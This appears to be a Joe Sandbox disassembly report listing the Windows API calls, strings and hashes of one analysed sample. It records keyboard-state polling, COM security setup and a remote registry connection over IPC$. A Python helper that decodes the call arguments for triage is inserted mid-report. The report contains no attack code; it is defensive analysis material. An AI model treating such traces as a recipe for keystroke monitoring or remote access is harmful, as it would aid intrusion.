                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 3038501623-2263619337
                                                                          • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                          • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-8599901
                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                          • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                          • IsWindow.USER32(?), ref: 00443C3A
                                                                          • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1834419854-3405671355
                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 455036304-4153970271
                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                          Similarity
                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                          • String ID:
                                                                          • API String ID: 2170234536-0
                                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                          Similarity
                                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                          • String ID:
                                                                          • API String ID: 3218148540-0
                                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                          • String ID:
                                                                          • API String ID: 136442275-0
                                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcstok.LIBCMT ref: 004674FF
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                          • String ID: X
                                                                          • API String ID: 3104067586-3081909835
                                                                          • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                          • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                                          Similarity
                                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 440038798-2785691316
                                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
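The two function entries above that matter most for triage are the keyboard-polling routine (GetAsyncKeyState/GetKeyState on 0xA0, 0xA1, 0x11, 0x12, 0x5B) and the COM setup routine (CoCreateInstance/CoCreateInstanceEx with CoInitializeSecurity and CoSetProxyBlanket). The report prints their arguments as raw hex, so the following added helper, which is not part of the Joe Sandbox report or of the sample, parses listing lines in the format shown on this page and decodes those arguments with the Windows SDK constants (virtual-key codes, CLSCTX bits, RPC_C_AUTHN/IMP levels, EOAC_DEFAULT). The sample input is constructed from the lines above; the "Part of subcall function" lines are deliberately skipped, and the triage tags are heuristics of this script, not Joe Sandbox signatures.

```python
"""Decode Joe Sandbox function-listing API lines for quick triage (added example)."""
import re

# Constructed input: lines copied from the two function entries discussed above.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00453CE0
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
APIs
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
"""

# "• Api.MODULE(args), ref: addr"; subcall lines start with "• Part of" and do not match.
API_RE = re.compile(r"•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Windows SDK constants (winuser.h, objbase.h, rpcdce.h).
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
CLSCTX = {0x1: "INPROC_SERVER", 0x2: "INPROC_HANDLER", 0x4: "LOCAL_SERVER", 0x10: "REMOTE_SERVER"}
AUTHN = {0: "DEFAULT", 1: "NONE", 2: "CONNECT", 3: "CALL", 4: "PKT", 5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
IMP = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY", 3: "IMPERSONATE", 4: "DELEGATE"}
MODIFIER_KEYS = {0xA0, 0xA1, 0x11, 0x12, 0x5B}


def parse_args(text):
    """'?' means the sandbox could not resolve the value; keep it as None."""
    if not text.strip():
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def flags(value, table):
    """Render a bit mask as 'A|B'; fall back to hex for unknown bits."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) or hex(value)


def parse_listing(text):
    """Split a listing into function entries; each entry begins at an 'APIs' line."""
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = []
            funcs.append(cur)
            continue
        m = API_RE.search(line)
        if m and cur is not None:
            cur.append((m["api"], m["module"], parse_args(m["args"]), m["ref"]))
    return funcs


def decode(api, args):
    """Human-readable decoding of the arguments we care about; '' if none apply."""
    try:
        if api in ("GetAsyncKeyState", "GetKeyState"):
            return VK.get(args[0], hex(args[0]))
        if api in ("CoCreateInstance", "CoCreateInstanceEx"):
            return "CLSCTX=" + flags(args[2], CLSCTX)
        if api == "CoInitializeSecurity":
            return f"authn={AUTHN.get(args[4], args[4])} imp={IMP.get(args[5], args[5])}"
        if api == "CoSetProxyBlanket":
            return "EOAC_DEFAULT" if args[7] == 0x800 else hex(args[7])
    except (IndexError, TypeError):  # unresolved ('?') or missing argument
        pass
    return ""


def triage(func):
    """Heuristic tags for one function entry (this script's own, not Joe's)."""
    apis = {a for a, *_ in func}
    polled = {args[0] for a, _, args, _ in func if a == "GetAsyncKeyState" and args and args[0] is not None}
    tags = []
    if MODIFIER_KEYS <= polled:
        tags.append("modifier-key polling (Shift/Ctrl/Alt/Win)")
    if "CoCreateInstanceEx" in apis and "CoSetProxyBlanket" in apis:
        tags.append("COM object with explicit proxy security blanket")
    return tags


def report(text):
    """Return [(index, tags, [(api, ref, decoded_args), ...]), ...]."""
    return [(i, triage(f), [(a, r, decode(a, args)) for a, _, args, r in f])
            for i, f in enumerate(parse_listing(text))]


if __name__ == "__main__":
    for idx, tags, calls in report(SAMPLE):
        print(f"function {idx}: {', '.join(tags) or 'no tag'}")
        for api, ref, dec in calls:
            print(f"  {api:22s} @ {ref} {dec}")
```

Run against the constructed sample, the first entry decodes to the five modifier keys polled in a loop and the second to CLSCTX_INPROC_SERVER|LOCAL_SERVER|REMOTE_SERVER with RPC_C_AUTHN_LEVEL_CONNECT / RPC_C_IMP_LEVEL_IMPERSONATE and EOAC_DEFAULT; feeding the whole report's listing through `report()` gives the same decoding for every entry.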
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                          • _wcslen.LIBCMT ref: 004610A3
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                          • String ID: ThumbnailClass
                                                                          • API String ID: 4136854206-1241985126
                                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                          • String ID: 2
                                                                          • API String ID: 1331449709-450215437
                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                          • API String ID: 3054410614-2561132961
                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 600699880-22481851
